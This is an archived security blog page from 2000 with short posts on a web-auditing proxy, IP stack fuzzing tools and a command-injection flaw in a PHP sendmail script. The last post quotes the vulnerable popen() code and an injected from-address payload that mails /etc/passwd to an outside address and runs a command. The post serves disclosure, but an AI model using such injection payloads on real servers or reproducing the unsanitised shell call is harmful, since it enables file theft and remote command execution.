| . |
|
Bitland.Net Security Notes
Comments? email jwilkins-at-bitland*net
More information on the author at Jonathan Wilkins's home page RSS feed available at http://www.bitland.net/index.rss 
|
| Archives: 2007, 2006, 2005, 2004, 2003, 2002, 2001, 2000 |
| |
| |
| Achilles, tool to assist auditing of web sites | (2000/11/16 12:00) |
Auditing web code can be a time consuming endeavour. There are a lot of automated tools for testing C code, but few aimed specifically at the various web based scripting languages. Achillies serves as a proxy that will allow you to change input fields on the fly. No more saving web pages, editing them to adjust input lengths. Re-loading.. bleh.. Achilles is available at Digizen |
| +digg | +del.icio.us | [Security ] | Permanent link |
| |
| IP Stack testing tools | (2000/11/16 12:00) |
Network stacks need to be tested with hostile input to determine if they're really up to the rigors of the big bad internet. In order to do this testing, you need automatic packet generation tools. These tools are also useful if you have any code that deals with raw ip packets, sniffers for example. ISIC (IP Stack Integrity Checker) is available Here IPTest is a part of Darren Reed's ipfilter package which is available Here |
| +digg | +del.icio.us | [Security ] | Permanent link |
| |
| sequoiasoft's sendmail php script dangerous | (2000/11/09 12:00) |
Written by Sequioa Software, this script allows execution of arbitrary code by a malicious user. Essentially, popen() executes a shell which does the actual interpretation of the command. If an attacker crafts their return email address carefully, then they can cause the popen() call to execute chosen commands or reveal files.
//The workhorse method, does the actual sending of the mail.
//Doesn't check for errors so be careful!
function Send($sendmail = "/usr/sbin/sendmail") {
if($this->from == "") {
$fp = popen($sendmail . " -i " . $this->to, "w");
} else {
$fp = popen($sendmail . " -i -f"" . $this->from . "" " .
$this->to, "w");
}
Given the above code fragment, if I provide a from line such as:
foo@bat.com" evil@mailinator.com < /etc/passwd; touch /tmp/gotcha;I can have the contents of any file that the webserver account (usually nobody) has access to, and can execute commands as that user |
| +digg | +del.icio.us | [Security ] | Permanent link |
| |
| RSS feed available at http://www.bitland.net/index.rss |